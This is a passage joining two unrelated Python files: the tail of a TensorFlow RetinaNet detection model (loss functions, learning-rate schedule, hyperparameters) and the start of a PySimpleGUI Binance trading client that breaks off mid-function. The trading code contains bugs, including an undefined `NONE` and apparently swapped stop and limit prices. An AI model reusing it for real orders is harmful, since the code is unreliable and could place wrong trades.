For batch size=64, the default values are listed below:
learning_rate=0.08,
lr_warmup_epoch=1.0,
first_lr_drop_epoch=8.0,
second_lr_drop_epoch=11.0;
The values are converted to a LR schedule listed below:
adjusted_learning_rate=0.08,
lr_warmup_step=1875,
first_lr_drop_step=15000,
second_lr_drop_step=20625;
For batch size=8, the default values will have the following LR shedule:
adjusted_learning_rate=0.01,
lr_warmup_step=15000,
first_lr_drop_step=120000,
second_lr_drop_step=165000;
For batch size=256 the default values will have the following LR shedule:
adjusted_learning_rate=0.32,
lr_warmup_step=468,
first_lr_drop_step=3750,
second_lr_drop_step=5157.
For training with different schedules, such as extended schedule with double
number of epochs, adjust the values in default_hparams(). Note that the
values are w.r.t. a batch size of 64.
For batch size=64, 1x schedule (default values),
learning_rate=0.08,
lr_warmup_step=1875,
first_lr_drop_step=15000,
second_lr_drop_step=20625;
For batch size=64, 2x schedule, *lr_drop_epoch are doubled.
first_lr_drop_epoch=16.0,
second_lr_drop_epoch=22.0;
The values are converted to a LR schedule listed below:
adjusted_learning_rate=0.08,
lr_warmup_step=1875,
first_lr_drop_step=30000,
second_lr_drop_step=41250.
Args:
params: a parameter dictionary that includes learning_rate, lr_warmup_epoch,
first_lr_drop_epoch, and second_lr_drop_epoch.
"""
# params['batch_size'] is per-shard within model_fn if use_tpu=true.
batch_size = (
params['batch_size'] * params['num_shards']
if params['use_tpu'] else params['batch_size'])
# Learning rate is proportional to the batch size
params['adjusted_learning_rate'] = (
params['learning_rate'] * batch_size / _DEFAULT_BATCH_SIZE)
steps_per_epoch = params['num_examples_per_epoch'] / batch_size
params['lr_warmup_step'] = int(params['lr_warmup_epoch'] * steps_per_epoch)
params['first_lr_drop_step'] = int(
params['first_lr_drop_epoch'] * steps_per_epoch)
params['second_lr_drop_step'] = int(
params['second_lr_drop_epoch'] * steps_per_epoch)
def learning_rate_schedule(adjusted_learning_rate, lr_warmup_init,
lr_warmup_step, first_lr_drop_step,
second_lr_drop_step, global_step):
"""Handles linear scaling rule, gradual warmup, and LR decay."""
# lr_warmup_init is the starting learning rate; the learning rate is linearly
# scaled up to the full learning rate after `lr_warmup_steps` before decaying.
linear_warmup = (
lr_warmup_init + (tf.cast(global_step, dtype=tf.float32) / lr_warmup_step
* (adjusted_learning_rate - lr_warmup_init)))
learning_rate = tf.where(global_step < lr_warmup_step, linear_warmup,
adjusted_learning_rate)
lr_schedule = [[1.0, lr_warmup_step], [0.1, first_lr_drop_step],
[0.01, second_lr_drop_step]]
for mult, start_global_step in lr_schedule:
learning_rate = tf.where(global_step < start_global_step, learning_rate,
adjusted_learning_rate * mult)
return learning_rate
def focal_loss(logits, targets, alpha, gamma, normalizer):
"""Compute the focal loss between `logits` and the golden `target` values.
Focal loss = -(1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
Args:
logits: A float32 tensor of size [batch, height_in, width_in,
num_predictions].
targets: A float32 tensor of size [batch, height_in, width_in,
num_predictions].
alpha: A float32 scalar multiplying alpha to the loss from positive examples
and (1-alpha) to the loss from negative examples.
gamma: A float32 scalar modulating loss from hard and easy examples.
normalizer: A float32 scalar normalizes the total loss from all examples.
Returns:
loss: A float32 scalar representing normalized total loss.
"""
with tf.name_scope('focal_loss'):
positive_label_mask = tf.equal(targets, 1.0)
cross_entropy = (
tf.nn.sigmoid_cross_entropy_with_logits(labels=targets, logits=logits))
probs = tf.sigmoid(logits)
probs_gt = tf.where(positive_label_mask, probs, 1.0 - probs)
# With small gamma, the implementation could produce NaN during back prop.
modulator = tf.pow(1.0 - probs_gt, gamma)
loss = modulator * cross_entropy
weighted_loss = tf.where(positive_label_mask, alpha * loss,
(1.0 - alpha) * loss)
total_loss = tf.reduce_sum(weighted_loss)
total_loss /= normalizer
return total_loss
def _classification_loss(cls_outputs,
cls_targets,
num_positives,
alpha=0.25,
gamma=2.0):
"""Computes classification loss."""
normalizer = num_positives
classification_loss = focal_loss(cls_outputs, cls_targets, alpha, gamma,
normalizer)
return classification_loss
def _box_loss(box_outputs, box_targets, num_positives, delta=0.1):
"""Computes box regression loss."""
# delta is typically around the mean value of regression target.
# for instances, the regression targets of 512x512 input with 6 anchors on
# P3-P7 pyramid is about [0.1, 0.1, 0.2, 0.2].
normalizer = num_positives * 4.0
mask = tf.not_equal(box_targets, 0.0)
box_loss = tf.losses.huber_loss(
box_targets,
box_outputs,
weights=mask,
delta=delta,
reduction=tf.losses.Reduction.SUM)
box_loss /= normalizer
return box_loss
def detection_loss(cls_outputs, box_outputs, labels, params):
"""Computes total detection loss.
Computes total detection loss including box and class loss from all levels.
Args:
cls_outputs: an OrderDict with keys representing levels and values
representing logits in [batch_size, height, width, num_anchors].
box_outputs: an OrderDict with keys representing levels and values
representing box regression targets in [batch_size, height, width,
num_anchors * 4].
labels: the dictionary that returned from dataloader that includes
groundturth targets.
params: the dictionary including training parameters specified in
default_haprams function in this file.
Returns:
total_loss: an integar tensor representing total loss reducing from
class and box losses from all levels.
cls_loss: an integar tensor representing total class loss.
box_loss: an integar tensor representing total box regression loss.
"""
# Sum all positives in a batch for normalization and avoid zero
# num_positives_sum, which would lead to inf loss during training
num_positives_sum = tf.reduce_sum(labels['mean_num_positives']) + 1.0
levels = cls_outputs.keys()
cls_losses = []
box_losses = []
for level in levels:
# Onehot encoding for classification labels.
cls_targets_at_level = tf.one_hot(labels['cls_targets_%d' % level],
params['num_classes'])
bs, width, height, _, _ = cls_targets_at_level.get_shape().as_list()
cls_targets_at_level = tf.reshape(cls_targets_at_level,
[bs, width, height, -1])
box_targets_at_level = labels['box_targets_%d' % level]
cls_losses.append(
_classification_loss(
cls_outputs[level],
cls_targets_at_level,
num_positives_sum,
alpha=params['alpha'],
gamma=params['gamma']))
box_losses.append(
_box_loss(
box_outputs[level],
box_targets_at_level,
num_positives_sum,
delta=params['delta']))
# Sum per level losses to total loss.
cls_loss = tf.add_n(cls_losses)
box_loss = tf.add_n(box_losses)
total_loss = cls_loss + params['box_loss_weight'] * box_loss
return total_loss, cls_loss, box_loss
def add_metric_fn_inputs(params, cls_outputs, box_outputs, metric_fn_inputs):
"""Selects top-k predictions and adds the selected to metric_fn_inputs.
Args:
params: a parameter dictionary that includes `min_level`, `max_level`,
`batch_size`, and `num_classes`.
cls_outputs: an OrderDict with keys representing levels and values
representing logits in [batch_size, height, width, num_anchors].
box_outputs: an OrderDict with keys representing levels and values
representing box regression targets in [batch_size, height, width,
num_anchors * 4].
metric_fn_inputs: a dictionary that will hold the top-k selections.
"""
cls_outputs_all = []
box_outputs_all = []
batch_size = tf.shape(cls_outputs[params['min_level']])[0]
# Concatenates class and box of all levels into one tensor.
for level in range(params['min_level'], params['max_level'] + 1):
cls_outputs_all.append(
tf.reshape(cls_outputs[level], [batch_size, -1, params['num_classes']]))
box_outputs_all.append(tf.reshape(box_outputs[level], [batch_size, -1, 4]))
cls_outputs_all = tf.concat(cls_outputs_all, 1)
box_outputs_all = tf.concat(box_outputs_all, 1)
# cls_outputs_all has a shape of [batch_size, N, num_classes] and
# box_outputs_all has a shape of [batch_size, N, 4]. The batch_size here
# is per-shard batch size. Recently, top-k on TPU supports batch
# dimension (b/67110441), but the following function performs top-k on
# each sample.
cls_outputs_all_after_topk = []
box_outputs_all_after_topk = []
indices_all = []
classes_all = []
def _compute_top_k(x):
"""Compute top-k values for each row in a batch."""
cls_outputs_per_sample, box_outputs_per_sample = x
cls_outputs_per_sample_reshape = tf.reshape(cls_outputs_per_sample, [-1])
_, cls_topk_indices = tf.nn.top_k(cls_outputs_per_sample_reshape,
k=anchors.MAX_DETECTION_POINTS)
# Gets top-k class and box scores.
indices = tf.div(cls_topk_indices, params['num_classes'])
classes = tf.mod(cls_topk_indices, params['num_classes'])
cls_indices = tf.stack([indices, classes], axis=1)
cls_outputs_after_topk = tf.gather_nd(cls_outputs_per_sample, cls_indices)
box_outputs_after_topk = tf.gather_nd(box_outputs_per_sample,
tf.expand_dims(indices, 1))
return [indices, classes, cls_outputs_after_topk, box_outputs_after_topk]
(indices_all, classes_all, cls_outputs_all_after_topk,
box_outputs_all_after_topk) = tf.map_fn(
_compute_top_k, [cls_outputs_all, box_outputs_all],
back_prop=False,
dtype=[tf.int32, tf.int32, tf.float32, tf.float32])
# Concatenates via the batch dimension.
metric_fn_inputs['cls_outputs_all'] = cls_outputs_all_after_topk
metric_fn_inputs['box_outputs_all'] = box_outputs_all_after_topk
metric_fn_inputs['indices_all'] = indices_all
metric_fn_inputs['classes_all'] = classes_all
def coco_metric_fn(batch_size, anchor_labeler, filename=None, **kwargs):
"""Evaluation metric fn. Performed on CPU, do not reference TPU ops."""
# add metrics to output
detections_bs = []
for index in range(batch_size):
cls_outputs_per_sample = kwargs['cls_outputs_all'][index]
box_outputs_per_sample = kwargs['box_outputs_all'][index]
indices_per_sample = kwargs['indices_all'][index]
classes_per_sample = kwargs['classes_all'][index]
detections = anchor_labeler.generate_detections(
cls_outputs_per_sample, box_outputs_per_sample, indices_per_sample,
classes_per_sample, tf.slice(kwargs['source_ids'], [index], [1]),
tf.slice(kwargs['image_scales'], [index], [1]))
detections_bs.append(detections)
eval_metric = coco_metric.EvaluationMetric(filename=filename)
coco_metrics = eval_metric.estimator_metric_fn(detections_bs,
kwargs['groundtruth_data'])
return coco_metrics
def _predict_postprocess(cls_outputs, box_outputs, labels, params):
"""Post processes prediction outputs."""
predict_anchors = anchors.Anchors(
params['min_level'], params['max_level'], params['num_scales'],
params['aspect_ratios'], params['anchor_scale'], params['image_size'])
cls_outputs, box_outputs, anchor_boxes = postprocess.reshape_outputs(
cls_outputs, box_outputs, predict_anchors.boxes, params['min_level'],
params['max_level'], params['num_classes'])
boxes, scores, classes, num_detections = postprocess.generate_detections(
cls_outputs, box_outputs, anchor_boxes)
predictions = {
'detection_boxes': boxes,
'detection_classes': classes,
'detection_scores': scores,
'num_detections': num_detections,
}
if labels is not None:
predictions.update({
'image_info': labels['image_info'],
'source_id': labels['source_ids'],
'groundtruth_data': labels['groundtruth_data'],
})
return predictions
def _model_fn(features, labels, mode, params, model, use_tpu_estimator_spec,
variable_filter_fn=None):
"""Model defination for the RetinaNet model based on ResNet.
Args:
features: the input image tensor with shape [batch_size, height, width, 3].
The height and width are fixed and equal.
labels: the input labels in a dictionary. The labels include class targets
and box targets which are dense label maps. The labels are generated from
get_input_fn function in dataloader.py
mode: the mode of TPUEstimator/Estimator including TRAIN, EVAL, and PREDICT.
params: the dictionary defines hyperparameters of model. The default
settings are in default_hparams function in this file.
model: the RetinaNet model outputs class logits and box regression outputs.
use_tpu_estimator_spec: Whether to use TPUEstimatorSpec or EstimatorSpec.
variable_filter_fn: the filter function that takes trainable_variables and
returns the variable list after applying the filter rule.
Returns:
tpu_spec: the TPUEstimatorSpec to run training, evaluation, or prediction.
"""
# In predict mode features is a dict with input as value of the 'inputs'.
image_info = None
if (mode == tf.estimator.ModeKeys.PREDICT
and isinstance(features, dict) and 'inputs' in features):
image_info = features['image_info']
labels = None
if 'labels' in features:
labels = features['labels']
features = features['inputs']
def _model_outputs():
return model(
features,
min_level=params['min_level'],
max_level=params['max_level'],
num_classes=params['num_classes'],
num_anchors=len(params['aspect_ratios'] * params['num_scales']),
resnet_depth=params['resnet_depth'],
is_training_bn=params['is_training_bn'])
if params['use_bfloat16']:
with contrib_tpu.bfloat16_scope():
cls_outputs, box_outputs = _model_outputs()
levels = cls_outputs.keys()
for level in levels:
cls_outputs[level] = tf.cast(cls_outputs[level], tf.float32)
box_outputs[level] = tf.cast(box_outputs[level], tf.float32)
else:
cls_outputs, box_outputs = _model_outputs()
levels = cls_outputs.keys()
# First check if it is in PREDICT mode.
if mode == tf.estimator.ModeKeys.PREDICT:
# Postprocess on host; memory layout for NMS on TPU is very inefficient.
def _predict_postprocess_wrapper(args):
return _predict_postprocess(*args)
predictions = contrib_tpu.outside_compilation(
_predict_postprocess_wrapper,
(cls_outputs, box_outputs, labels, params))
# Include resizing information on prediction output to help bbox drawing.
if image_info is not None:
predictions.update({
'image_info': tf.identity(image_info, 'ImageInfo'),
})
return contrib_tpu.TPUEstimatorSpec(
mode=tf.estimator.ModeKeys.PREDICT, predictions=predictions)
# Load pretrained model from checkpoint.
if params['resnet_checkpoint'] and mode == tf.estimator.ModeKeys.TRAIN:
def scaffold_fn():
"""Loads pretrained model through scaffold function."""
tf.train.init_from_checkpoint(params['resnet_checkpoint'], {
'/': 'resnet%s/' % params['resnet_depth'],
})
return tf.train.Scaffold()
else:
scaffold_fn = None
# Set up training loss and learning rate.
update_learning_rate_schedule_parameters(params)
global_step = tf.train.get_global_step()
learning_rate = learning_rate_schedule(
params['adjusted_learning_rate'], params['lr_warmup_init'],
params['lr_warmup_step'], params['first_lr_drop_step'],
params['second_lr_drop_step'], global_step)
# cls_loss and box_loss are for logging. only total_loss is optimized.
total_loss, cls_loss, box_loss = detection_loss(cls_outputs, box_outputs,
labels, params)
total_loss += _WEIGHT_DECAY * tf.add_n([
tf.nn.l2_loss(v)
for v in tf.trainable_variables()
if 'batch_normalization' not in v.name
])
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.train.MomentumOptimizer(
learning_rate, momentum=params['momentum'])
if params['use_tpu']:
optimizer = contrib_tpu.CrossShardOptimizer(optimizer)
else:
if params['auto_mixed_precision']:
optimizer = tf.train.experimental.enable_mixed_precision_graph_rewrite(
optimizer)
# Batch norm requires `update_ops` to be executed alongside `train_op`.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
var_list = variable_filter_fn(
tf.trainable_variables(),
params['resnet_depth']) if variable_filter_fn else None
minimize_op = optimizer.minimize(total_loss, global_step, var_list=var_list)
train_op = tf.group(minimize_op, update_ops)
else:
train_op = None
eval_metrics = None
if mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(**kwargs):
"""Returns a dictionary that has the evaluation metrics."""
batch_size = params['batch_size']
eval_anchors = anchors.Anchors(
params['min_level'], params['max_level'], params['num_scales'],
params['aspect_ratios'], params['anchor_scale'], params['image_size'])
anchor_labeler = anchors.AnchorLabeler(eval_anchors,
params['num_classes'])
cls_loss = tf.metrics.mean(kwargs['cls_loss_repeat'])
box_loss = tf.metrics.mean(kwargs['box_loss_repeat'])
coco_metrics = coco_metric_fn(batch_size, anchor_labeler,
params['val_json_file'], **kwargs)
# Add metrics to output.
output_metrics = {
'cls_loss': cls_loss,
'box_loss': box_loss,
}
output_metrics.update(coco_metrics)
return output_metrics
cls_loss_repeat = tf.reshape(
tf.tile(tf.expand_dims(cls_loss, 0), [
params['batch_size'],
]), [params['batch_size'], 1])
box_loss_repeat = tf.reshape(
tf.tile(tf.expand_dims(box_loss, 0), [
params['batch_size'],
]), [params['batch_size'], 1])
metric_fn_inputs = {
'cls_loss_repeat': cls_loss_repeat,
'box_loss_repeat': box_loss_repeat,
'source_ids': labels['source_ids'],
'groundtruth_data': labels['groundtruth_data'],
'image_scales': labels['image_scales'],
}
add_metric_fn_inputs(params, cls_outputs, box_outputs, metric_fn_inputs)
eval_metrics = (metric_fn, metric_fn_inputs)
if use_tpu_estimator_spec:
return contrib_tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
eval_metrics=eval_metrics,
scaffold_fn=scaffold_fn)
else:
return tf.estimator.EstimatorSpec(
mode=mode,
loss=total_loss,
# TODO(rostam): Fix bug to get scaffold working.
# scaffold=scaffold_fn(),
train_op=train_op)
def tpu_retinanet_model_fn(features, labels, mode, params):
"""RetinaNet model for TPUEstimator."""
return _model_fn(
features,
labels,
mode,
params,
model=retinanet_architecture.retinanet,
use_tpu_estimator_spec=True,
variable_filter_fn=retinanet_architecture.remove_variables)
def est_retinanet_model_fn(features, labels, mode, params):
"""RetinaNet model for Estimator."""
return _model_fn(
features,
labels,
mode,
params,
model=retinanet_architecture.retinanet,
use_tpu_estimator_spec=False,
variable_filter_fn=retinanet_architecture.remove_variables)
def default_hparams():
return contrib_training.HParams(
# input preprocessing parameters
image_size=640,
input_rand_hflip=True,
train_scale_min=1.0,
train_scale_max=1.0,
# dataset specific parameters
num_classes=90,
skip_crowd_during_training=True,
# model architecture
min_level=3,
max_level=7,
num_scales=3,
aspect_ratios=[(1.0, 1.0), (1.4, 0.7), (0.7, 1.4)],
anchor_scale=4.0,
resnet_depth=50,
# is batchnorm training mode
is_training_bn=True,
# Placeholder of number of epoches, default is 2x schedule.
# Reference:
# https://github.com/facebookresearch/Detectron/blob/master/MODEL_ZOO.md#training-schedules
num_epochs=24,
# optimization
momentum=0.9,
learning_rate=0.08,
lr_warmup_init=0.008,
lr_warmup_epoch=1.0,
first_lr_drop_epoch=8.0,
second_lr_drop_epoch=11.0,
# classification loss
alpha=0.25,
gamma=1.5,
# localization loss
delta=0.1,
box_loss_weight=50.0,
# enable bfloat
use_bfloat16=True,
)
|
<filename>BinanceGUI.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# <NAME> (https://sites.google.com/view/a2gs/)
from os import getenv
from sys import exit, argv
from textwrap import fill
import configparser
import PySimpleGUI as sg
from binance.client import Client
from binance.exceptions import BinanceAPIException, BinanceWithdrawException, BinanceRequestException
import binanceOrder as BO
import binanceUtil as BU
#from gui.orderListButton import getOrderList, orderListFixed
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
class cfg_c:
cfgFile = 0;
cfgHeader = ''
cfg = 0
def __init__(self, cfgFileName : str = "BinanceGUI.cfg", cfgHead : str = "DEFAULT"):
self.cfg = configparser.ConfigParser()
self.cfgFile = cfgFileName
self.cfgHeader = cfgHead
def load(self)->[bool, str]:
try:
self.cfg.read(self.cfgFile)
except Exception as e:
return False, e
return True, "Ok"
def get(self, k : str = ''):
try:
return self.cfg[self.cfgHeader][k]
except:
# Default values:
if k == 'BINANCE_APIKEY':
return ''
elif k == 'BINANCE_SEKKEY':
return ''
elif k == 'BINANCE_RECVWINDOW':
return '5000'
elif k == 'COPYTRADE':
return 'NO'
elif k == 'THEME':
return 'Dark Blue 3'
else:
return NONE
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
cfgbnb = cfg_c()
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
def printAccountInfo(client)->[bool, str]:
def printAccount(accBalance)->str:
return f"Asset balance [{accBalance['asset']}] | Free [{accBalance['free']}] | Locked [{accBalance['locked']}]"
def printMarginAssets(asset, seq = 0)->str:
return f"{seq}) Asset: [{asset['asset']}]\n\tBorrowed.: [{asset['borrowed']}]\n\tFree.....: [{asset['free']}]\n\tLocked...: [{asset['locked']}]\n\tNet asset: [{asset['netAsset']}]\n"
try:
acc = client.get_account() #recvWindow = BU.getRecvWindow())
except BinanceAPIException as e:
return False, f"Erro at client.get_account() BinanceAPIException: [{e.status_code} - {e.message}]"
except BinanceRequestException as e:
return False, f"Erro at client.get_account() BinanceRequestException: [{e.status_code} - {e.message}]"
except Exception as e:
return False, f"Erro at client.get_account(): {e}"
try:
accStatus = client.get_account_status() # recvWindow = BU.getRecvWindow())
except BinanceWithdrawException as e:
return False, f"Erro at client.get_account_status() BinanceWithdrawException: [{e.status_code} - {e.message}]"
except Exception as e:
return False, f"Erro at client.get_account_status(): {e}"
totalinfos = f"Can trade............? [{acc['canTrade']}]\n"
totalinfos += f"Can withdraw.........? [{acc['canWithdraw']}]\n"
totalinfos += f"Can deposit..........? [{acc['canDeposit']}]\n"
totalinfos += f"Account type.........: [{acc['accountType']}]\n"
totalinfos += f"Account status detail: [{accStatus['msg']}] Success: [{accStatus['success']}]\n"
totalinfos += f"Commissions..........: Maker: [{acc['makerCommission']}] | Taker: [{acc['takerCommission']}] | Buyer: [{acc['buyerCommission']}] | Seller: [{acc['sellerCommission']}]\n\n"
totalinfos += "Balances:\n"
if len(acc['balances']) != 0:
totalinfos += '\n'.join([printAccount(n) for n in acc['balances'] if float(n['free']) != 0.0 or float(n['locked']) != 0.0]) + '\n\n'
else:
totalinfos += 'Zero.\n\n'
totalinfos += "Margin accoutn information:\n"
try:
marginInfo = client.get_margin_account() #recvWindow = BU.getRecvWindow())
except BinanceRequestException as e:
return False, f"Erro at client.get_margin_account() BinanceRequestException: [{e.status_code} - {e.message}]"
except BinanceAPIException as e:
return False, f"Erro at client.get_margin_account() BinanceAPIException: [{e.status_code} - {e.message}]"
except Exception as e:
return False, f"Erro at client.get_margin_account(): {e}"
cleanedMarginAssets = [n for n in marginInfo['userAssets'] if float(n['netAsset']) != 0.0]
totalinfos += f"Borrow Enabled........? [{marginInfo['borrowEnabled']}]\n"
totalinfos += f"Trade enabled.........? [{marginInfo['tradeEnabled']}]\n"
totalinfos += f"Level.................: [{marginInfo['marginLevel']}]\n"
totalinfos += f"Total asset of BTC....: [{marginInfo['totalAssetOfBtc']}]\n"
totalinfos += f"Total liability of BTC: [{marginInfo['totalLiabilityOfBtc']}]\n"
totalinfos += f"Total Net asset of BTC: [{marginInfo['totalNetAssetOfBtc']}]\n\n"
totalinfos += 'Borrowed assets:\n'
totalinfos += '\n'.join ([printMarginAssets(n, i) for i, n in enumerate(cleanedMarginAssets, 1)])
layoutAccInfo = [[sg.Multiline(totalinfos, key='-INFOMLINE-' + sg.WRITE_ONLY_KEY, size=(100,25), font='Courier 10', disabled=True)], [sg.Button('Ok')]]
windowInfoAcc = sg.Window("Acc Infos", layoutAccInfo).Finalize()
eventInfoAcc, valuesInfoAcc = windowInfoAcc.read()
windowInfoAcc.close()
del totalinfos
del acc
del accStatus
del marginInfo
del cleanedMarginAssets
del windowInfoAcc
del layoutAccInfo
return True, "Ok"
def COPYTRADE_IsEnable()->bool:
global cfgbnb
return True if cfgbnb.get('COPYTRADE') == 'YES' else False
def BS_MarginStopLimit(client, bgcolor = '', windowTitle = '', clientSide = 0)->[bool, str]:
layoutMSL = [
[sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
[sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
[sg.Text('Stop Price: ', background_color = bgcolor), sg.InputText(key = '-STOP PRICE-')],
[sg.Text('Limit Price: ', background_color = bgcolor), sg.InputText(key = '-LIMIT PRICE-')],
[sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
[sg.Button('SEND!'), sg.Button('CANCEL')],
]
windowMSL = sg.Window(windowTitle, layoutMSL, background_color = bgcolor).Finalize()
while True:
eventMSL, valuesMSL = windowMSL.read()
if eventMSL == 'SEND!':
BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesMSL['-SYMBOL-']}] Qtd: [{valuesMSL['-QTD-']}] Stop Prc: [{valuesMSL['-STOP PRICE-']}] Limit Prc: [{valuesMSL['-LIMIT PRICE-']}]")
if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
BU.errPrint(f'{windowTitle} - CANCELLED!')
continue
ret, retMsg = BO.orderMargin(client,
symbOrd = valuesMSL['-SYMBOL-'],
qtdOrd = valuesMSL['-QTD-'],
prcOrd = valuesMSL['-STOP PRICE-'],
prcStop = valuesMSL['-LIMIT PRICE-'],
sideOrd = clientSide,
typeOrd = "TAKE_PROFIT_LIMIT",
limit = 0.0 )
if ret == False:
sg.popup('ERRO! Order didnt post!')
windowMSL.close()
del windowMSL
del layoutMSL
return False, f"Erro posting order {retMsg}!"
if valuesMSL['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
BU.errPrint(f"COPYTRADE: [MARGINSTOPLIMIT | TAKE_PROFIT_LIMIT | {valuesMSL['-SYMBOL-']} | {valuesMSL['-QTD-']} | {valuesMSL['-STOP PRICE-']} | {valuesMSL['-LIMIT PRICE-']} | {clientSide}]")
BU.errPrint(f'{windowTitle} - CONFIRMED!')
elif eventMSL == sg.WIN_CLOSED or eventMSL == 'CANCEL':
BU.errPrint(f'{windowTitle} - CANCELLED!')
break
windowMSL.close()
del windowMSL
del layoutMSL
return True, "Ok"
def BS_MarginMarket(client, bgcolor = '', windowTitle = '', clientSide = 0)-> bool:
layoutMM = [
[sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
[sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
[sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
[sg.Button('SEND!'), sg.Button('CANCEL')],
]
windowMM = sg.Window(windowTitle, layoutMM, background_color = bgcolor).Finalize()
while True:
eventMM, valuesMM = windowMM.read()
if eventMM == 'SEND!':
BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesMM['-SYMBOL-']}] Qtd: [{valuesMM['-QTD-']}]")
if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
BU.errPrint(f'{windowTitle} - CANCELLED!')
continue
ret, msgRet = BO.orderMargin(client,
symbOrd = valuesMM['-SYMBOL-'],
qtdOrd = valuesMM['-QTD-'],
sideOrd = clientSide,
typeOrd = Client.ORDER_TYPE_MARKET)
if ret == False:
sg.popup('ERRO! Order didnt post!')
windowMM.close()
del windowMM
del layoutMM
return False, f"Erro placing order! {msgRet}"
if valuesMM['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
print("Call COPYTRADE...")
BU.errPrint(f'{windowTitle} - CONFIRMED!')
elif eventMM == sg.WIN_CLOSED or eventMM == 'CANCEL':
BU.errPrint(f'{windowTitle} - CANCELLED!')
break
windowMM.close()
del windowMM
del layoutMM
return True, "Ok"
def BS_MarginLimit(client, bgcolor = '', windowTitle = '', clientSide = 0)->[bool, str]:
layoutML = [
[sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
[sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
[sg.Text('Price: ', background_color = bgcolor), sg.InputText(key = '-PRICE-')],
[sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
[sg.Button('SEND!'), sg.Button('CANCEL')],
]
windowML = sg.Window(windowTitle, layoutML, background_color = bgcolor).Finalize()
while True:
eventML, valuesML = windowML.read()
if eventML == 'SEND!':
BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesML['-SYMBOL-']}] Qtd: [{valuesML['-QTD-']}] Price: [{valuesML['-PRICE-']}]")
if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
BU.errPrint(f'{windowTitle} - CANCELLED!')
continue
ret, msgRet = BO.orderMargin(client,
symbOrd = valuesML['-SYMBOL-'],
qtdOrd = valuesML['-QTD-'],
prcOrd = valuesML['-PRICE-'],
sideOrd = clientSide,
typeOrd = Client.ORDER_TYPE_LIMIT)
if ret == False:
sg.popup('ERRO! Order didnt post!')
windowML.close()
del windowML
del layoutML
return False, f"Eror posting order! {msgRet}"
if valuesML['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
print("Call COPYTRADE...")
BU.errPrint(f'{windowTitle} - CONFIRMED!')
elif eventML == sg.WIN_CLOSED or eventML == 'CANCEL':
BU.errPrint(f'{windowTitle} - CANCELLED!')
break
windowML.close()
del windowML
del layoutML
return True, "Ok"
def BS_SpotStopLimit(client, bgcolor = '', windowTitle = '', clientSide = 0)->[ bool, str]:
layoutSSL = [
[sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
[sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
[sg.Text('Stop Price: ', background_color = bgcolor), sg.InputText(key = '-STOP PRICE-')],
[sg.Text('Limit Price: ', background_color = bgcolor), sg.InputText(key = '-LIMIT PRICE-')],
[sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
[sg.Button('SEND!'), sg.Button('CANCEL')],
]
windowSSL = sg.Window(windowTitle, layoutSSL, background_color = bgcolor).Finalize()
while True:
eventSSL, valuesSSL = windowSSL.read()
if eventSSL == 'SEND!':
BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesSSL['-SYMBOL-']}] Qtd: [{valuesSSL['-QTD-']}] Stop Prc: [{valuesSSL['-STOP PRICE-']}] Limit Prc: [{valuesSSL['-LIMIT PRICE-']}]")
if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
BU.errPrint(f'{windowTitle} - CANCELLED!')
continue
ret, msgRet = BO.orderSpotLimit(client,
symbOrd = valuesSSL['-SYMBOL-'],
qtdOrd = valuesSSL['-QTD-'],
prcStopOrd = valuesSSL['-STOP PRICE-'],
prcStopLimitOrd = valuesSSL['-LIMIT PRICE-'],
sideOrd = clientSide)
if ret == False:
sg.popup('ERRO! Order didnt post!')
windowSSL.close()
del windowSSL
del layoutSSL
return False, f"Eror posting order! {msgRet}"
if valuesSSL['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
print("Call COPYTRADE...")
BU.errPrint(f'{windowTitle} - CONFIRMED!')
elif eventSSL == sg.WIN_CLOSED or eventSSL == 'CANCEL':
BU.errPrint(f'{windowTitle} - CANCELLED!')
break
windowSSL.close()
del windowSSL
del layoutSSL
return True, "Ok"
def BS_SpotMarket(client, bgcolor = '', windowTitle = '', clientSide = 0)->[bool, str]:
layoutSM = [
[sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
[sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
[sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
[sg.Button('SEND!'), sg.Button('CANCEL')],
]
windowSM = sg.Window(windowTitle, layoutSM, background_color = bgcolor).Finalize()
while True:
eventSM, valuesSM = windowSM.read()
if eventSM == 'SEND!':
BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesSM['-SYMBOL-']}] Qtd: [{valuesSM['-QTD-']}]")
